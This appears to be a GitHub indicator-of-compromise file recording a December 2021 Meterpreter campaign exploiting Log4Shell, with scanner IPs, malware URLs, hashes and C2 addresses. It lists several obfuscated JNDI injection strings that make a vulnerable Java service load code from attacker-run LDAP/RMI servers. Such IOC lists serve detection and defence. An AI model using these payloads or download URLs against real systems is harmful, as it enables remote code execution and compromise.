forked from CronUp/Malware-IOCs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
2021-12-22_MeterpreterLog4Shell
44 lines (38 loc) · 1.49 KB
/
2021-12-22_MeterpreterLog4Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
########################################################
Meterpreter via Log4Shell
########################################################
ORIGIN IPS (SCAN):
165.22.73.229
51.195.192.126
180.128.242.6
213.139.206.157
144.202.116.191
128.199.203.42
173.249.2.236
165.22.73.229
202.182.106.33
110.10.129.34
LOG4SHELL PAYLOADS:
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/#Binary}
${jndi:rmi://144.202.34.169:1389/Binary}
${jndi:ldap://144.202.34.169:1389/Binary}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/Binary}
${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
ROGUE LDAP/RMI:
144.202.34.169:1389
51.79.74.227:1389
JAVA CLASS:
rmi://144.202.34.169:1389/Binary
http://144.202.34.169:8001/Binary.class
7d24fc33909e876dd6f89087e15b127c2dafaa291d06f8b5972a058ec5ecbb56 Binary.class
https://www.virustotal.com/gui/file/7d24fc33909e876dd6f89087e15b127c2dafaa291d06f8b5972a058ec5ecbb56/detection
METERPRETER:
http://cucsur.udgvirtual.udg.mx/oa/2020/SisTur/G99ZTE/m.py
http://webkaksa.com/59F1/christmas.py
https://edutra.co.in/HUS8/christmas.py
d042a0498530b38a8edbef525e009944cd28d89da61a9cfc6e21134041183e50 christmas.py
https://www.virustotal.com/gui/file/d042a0498530b38a8edbef525e009944cd28d89da61a9cfc6e21134041183e50
185.254.196.122:4445
IP 144.202.34.169 TAMBIÉN ES C2 DE EMOTET:
https://feodotracker.abuse.ch/browse/host/144.202.34.169/